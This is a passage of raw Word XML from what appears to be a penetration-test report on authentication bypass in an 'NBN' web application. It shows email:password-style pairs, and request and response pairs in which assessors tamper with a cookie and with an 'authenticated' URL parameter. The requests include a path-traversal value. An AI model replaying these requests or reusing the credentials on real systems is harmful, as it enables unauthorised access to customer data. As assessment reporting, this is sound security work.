                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>long@gmail.com :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>capone</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> //// </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="005E9219"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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>hjk12345@hotmail.com :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ned</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> //// </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="471770DE"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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>snoogy@yahoo.com :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> frank //// </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6951DFCC"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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>polobear@yahoo.com :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> jess //// </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76AFFABF" w14:textId="6952EAD6" w:rsidR="005D1352" w:rsidRPr="00B40A5B" w:rsidRDefault="00B40A5B" w:rsidP="00B40A5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1535C1AF" w14:textId="6B7F6AAD" w:rsidR="00455A9D" w:rsidRDefault="00455A9D" w:rsidP="00455A9D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2218579B" w14:textId="234A8A99" w:rsidR="00B40A5B" w:rsidRDefault="00B40A5B" w:rsidP="00455A9D">
      <w:r>
        <w:t>After the assessors intercepted the request and changed the cookie value, the customer list was displayed in the browser, shown below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B35815" w14:textId="60753A6D" w:rsidR="00B40A5B" w:rsidRPr="002C6421" w:rsidRDefault="00B40A5B" w:rsidP="002C6421">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77699C6C" wp14:editId="3582F1A9">
            <wp:extent cx="5943600" cy="2286000"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
            <wp:docPr id="1298310833"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0833" name="Picture 4" descr="Graphical user interface, text,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49791"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2286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6421">
        <w:br/>
      </w:r>
      <w:r w:rsidR="002C6421">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Customer List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC6F63B" w14:textId="1DE9094E" w:rsidR="00B40A5B" w:rsidRDefault="00B40A5B" w:rsidP="00455A9D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>An attacker who exploited this vulnerability would be able to access sensitive data and other resources protected by authentication without signing into the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CA0010" w14:textId="28DB00BE" w:rsidR="00B40A5B" w:rsidRDefault="00B40A5B" w:rsidP="00455A9D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40A5B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://10.10.0.66:8001 (Staging)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC65D96" w14:textId="64A4884E" w:rsidR="00B40A5B" w:rsidRDefault="00B40A5B" w:rsidP="00B40A5B">
      <w:r>
        <w:t xml:space="preserve">The assessment team discovered a similar vulnerability exists in the NBN staging application. The staging application uses a Boolean URL parameter, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F62F5D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>authenticated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, to validate whether the user has successfully logged in to the application. When a user attempts to access protected resources, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00F62F5D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/internal/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F62F5D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>customers.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, without authentication, the application responds with an error message prompting the user to log in first, shown in the below request and response pair:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27014964" w14:textId="77777777" w:rsidR="00B40A5B" w:rsidRPr="00F62F5D" w:rsidRDefault="00B40A5B" w:rsidP="00B40A5B">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B40A5B" w14:paraId="5E9533C1" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="3D1E2F4B" w14:textId="4160B1FD" w:rsidR="00B40A5B" w:rsidRPr="00B40A5B" w:rsidRDefault="00B40A5B" w:rsidP="00B40A5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GET /internal/customers.php?</w:t>
            </w:r>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>authenticated=</w:t>
            </w:r>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&amp;list</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=..</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>%2Fdata%2Fcustomer.list HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A09254A" w14:textId="77777777" w:rsidR="00B40A5B" w:rsidRDefault="00B40A5B" w:rsidP="00B40A5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Host: 10.10.0.66:8001</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DC3E0D4" w14:textId="4A4A2D21" w:rsidR="00B40A5B" w:rsidRPr="00B40A5B" w:rsidRDefault="00B40A5B" w:rsidP="00B40A5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1CEF4E01" w14:textId="77777777" w:rsidR="00B40A5B" w:rsidRPr="00F62F5D" w:rsidRDefault="00B40A5B" w:rsidP="00B40A5B">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B40A5B" w14:paraId="18ADD550" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="63135B89" w14:textId="77777777" w:rsidR="00B40A5B" w:rsidRPr="00B40A5B" w:rsidRDefault="00B40A5B" w:rsidP="00B40A5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP/1.1 200 OK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78AB8942" w14:textId="77777777" w:rsidR="00B40A5B" w:rsidRPr="00B40A5B" w:rsidRDefault="00B40A5B" w:rsidP="00B40A5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Date: Fri, 28 Apr 2023 12:29:16 GMT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="641909E9" w14:textId="2F9E0956" w:rsidR="00B40A5B" w:rsidRPr="00B40A5B" w:rsidRDefault="00B40A5B" w:rsidP="00B40A5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F753975" w14:textId="77777777" w:rsidR="00B40A5B" w:rsidRPr="00B40A5B" w:rsidRDefault="00B40A5B" w:rsidP="00B40A5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&lt;div class="container"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F2A4139"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header class="major"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13153480"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p&gt;&lt;b&gt;Future Customers&lt;/b&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F8BD1AA"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p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21F74552"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header&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="262B171C"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p&gt;FOR INTERNAL USE ONLY&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E22491D"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p&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Error: You must login first.</w:t>
            </w:r>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44F57C49" w14:textId="2F629ADB" w:rsidR="00B40A5B" w:rsidRPr="00B40A5B" w:rsidRDefault="00B40A5B" w:rsidP="00B40A5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>&lt;p&gt;FOR INTERNAL USE ONLY&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="16694232" w14:textId="5A5CA20A" w:rsidR="00B40A5B" w:rsidRDefault="00B40A5B" w:rsidP="00B40A5B">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The assessors were able to access the customer list by changing the value of </w:t>
      </w:r>
      <w:r w:rsidRPr="00F62F5D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>authenticated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the URL</w:t>
      </w:r>
      <w:r w:rsidR="002C6421">
        <w:t>, as shown in the following request and response pair:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74338CA3" w14:textId="77777777" w:rsidR="00B40A5B" w:rsidRPr="00F62F5D" w:rsidRDefault="00B40A5B" w:rsidP="00B40A5B">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B40A5B" w14:paraId="0413CACA" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="47BF6488" w14:textId="77777777" w:rsidR="002C6421" w:rsidRPr="002C6421" w:rsidRDefault="002C6421" w:rsidP="002C6421">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GET /internal/customers.php?</w:t>
            </w:r>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>authenticated=1</w:t>
            </w:r>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&amp;list</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=..</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>%2Fdata%2Fcustomer.list HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14809013" w14:textId="77777777" w:rsidR="002C6421" w:rsidRPr="002C6421" w:rsidRDefault="002C6421" w:rsidP="002C6421">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Host: 10.10.0.66:8001</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B690267" w14:textId="2E5877AB" w:rsidR="00B40A5B" w:rsidRPr="005D1352" w:rsidRDefault="002C6421" w:rsidP="002C6421">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="368E16F7" w14:textId="77777777" w:rsidR="00B40A5B" w:rsidRPr="00F62F5D" w:rsidRDefault="00B40A5B" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5CCC9AF6" w14:textId="77777777" w:rsidR="002C6421" w:rsidRDefault="002C6421" w:rsidP="00B40A5B">
      <w:pPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="325F517B" w14:textId="77777777" w:rsidR="002C6421" w:rsidRDefault="002C6421">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06575EAF" w14:textId="3061C8C1" w:rsidR="00B40A5B" w:rsidRPr="00F62F5D" w:rsidRDefault="00B40A5B" w:rsidP="00B40A5B">
      <w:pPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62F5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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B40A5B" w14:paraId="2B485419" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="070FDA54" w14:textId="77777777" w:rsidR="002C6421" w:rsidRPr="002C6421" w:rsidRDefault="002C6421" w:rsidP="002C6421">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP/1.1 200 OK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06378CEE" w14:textId="77777777" w:rsidR="002C6421" w:rsidRDefault="002C6421" w:rsidP="002C6421">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Date: Fri, 28 Apr 2023 12:31:44 GMT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28539A72" w14:textId="23EDC890" w:rsidR="002C6421" w:rsidRPr="002C6421" w:rsidRDefault="002C6421" w:rsidP="002C6421">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="009AE899"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t>&lt;div class="container"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51D9E563"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t>&lt;header class="major"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F41DC76"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r>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>&lt;p&gt;&lt;b&gt;Future Customers&lt;/b&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CB3637A"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r>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58FBF32B"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t>&lt;/header&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54ACAD22" w14:textId="77777777" w:rsidR="002C6421" w:rsidRPr="002C6421" w:rsidRDefault="002C6421" w:rsidP="002C6421">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>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r>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&lt;p&gt;FOR INTERNAL USE ONLY&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F7ADC7F" w14:textId="77777777" w:rsidR="002C6421" w:rsidRPr="002C6421" w:rsidRDefault="002C6421" w:rsidP="002C6421">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>&lt;p&gt;SAMPLE DATA</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2769EA9A" w14:textId="77777777" w:rsidR="002C6421" w:rsidRPr="002C6421" w:rsidRDefault="002C6421" w:rsidP="002C6421">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2559D02B" w14:textId="77777777" w:rsidR="002C6421" w:rsidRPr="002C6421" w:rsidRDefault="002C6421" w:rsidP="002C6421">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C6421">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>&lt;p&gt;FOR INTERNAL USE ONLY&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
